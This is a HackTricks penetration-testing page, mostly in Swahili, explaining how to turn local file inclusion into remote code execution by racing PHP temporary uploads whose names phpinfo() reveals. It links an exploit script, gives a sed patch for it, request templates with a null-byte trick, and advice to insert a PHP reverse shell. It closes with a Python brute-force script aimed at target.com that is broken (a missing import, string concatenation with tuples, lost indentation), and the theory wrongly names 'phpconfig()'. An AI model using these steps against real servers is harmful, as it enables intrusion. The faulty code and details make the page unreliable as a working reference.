LFI2RCE via phpinfo()

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Ili kutumia udhaifu huu unahitaji: Udhaifu wa LFI, ukurasa ambapo phpinfo() inaonyeshwa, "file_uploads = on" na seva inapaswa kuwa na uwezo wa kuandika katika saraka ya "/tmp".

https://www.insomniasec.com/downloads/publications/phpinfolfi.py

Tutorial HTB: https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s

Unahitaji kurekebisha exploit (badilisha => kwa =>). Ili kufanya hivyo unaweza kufanya:

sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g' phpinfolfi.py

You have to change also the payload at the beginning of the exploit (for a php-rev-shell for example), the REQ1 (this should point to the phpinfo page and should have the padding included, i.e.: REQ1="""POST /install.php?mode=phpinfo&a="""+padding+""" HTTP/1.1), and LFIREQ (this should point to the LFI vulnerability, i.e.: LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r -- Check the double "%" when exploiting null char)

212KB

LFI-With-PHPInfo-Assistance.pdf

pdf

Nadharia

Ikiwa upakuaji unaruhusiwa katika PHP na unajaribu kupakia faili, faili hizi huhifadhiwa katika directory ya muda hadi seva ikamilishe processing ya ombi, kisha faili hizi za muda zifutwa.

Kisha, ikiwa umepata udhaifu wa LFI katika seva ya wavuti unaweza kujaribu kukisia jina la faili ya muda iliyoundwa na kutumia RCE kwa kufikia faili ya muda kabla haijafutwa.

Katika Windows faili kawaida huhifadhiwa katika C:\Windows\temp\php

Katika linux jina la faili lilikuwa random na liliko katika /tmp. Kwa kuwa jina ni random, inahitajika kuchota kutoka mahali fulani jina la faili ya muda na kuifikia kabla haijafutwa. Hii inaweza kufanywa kwa kusoma thamani ya variable $_FILES ndani ya maudhui ya kazi "phpconfig()".

phpinfo()

PHP inatumia buffer ya 4096B na wakati inakuwa kamili, inatumwa kwa mteja. Kisha mteja anaweza kutuma ombii mengi makubwa (akitumia vichwa vikubwa) akipakia php reverse shell, kusubiri kwa sehemu ya kwanza ya phpinfo() irudishwe (ambapo jina la faili ya muda liko) na kujaribu kufikia faili ya muda kabla seva ya php haijafuta faili hiyo kwa kutumia udhaifu wa LFI.

Python script to try to bruteforce the name (if length = 6)

import itertools
import requests
import sys

print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)


print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text:  # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)

print('[x] Something went wrong, please try again')

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousLFI2RCE via Segmentation Fault NextLFI2RCE Via temp file uploads

Last updated 7 days ago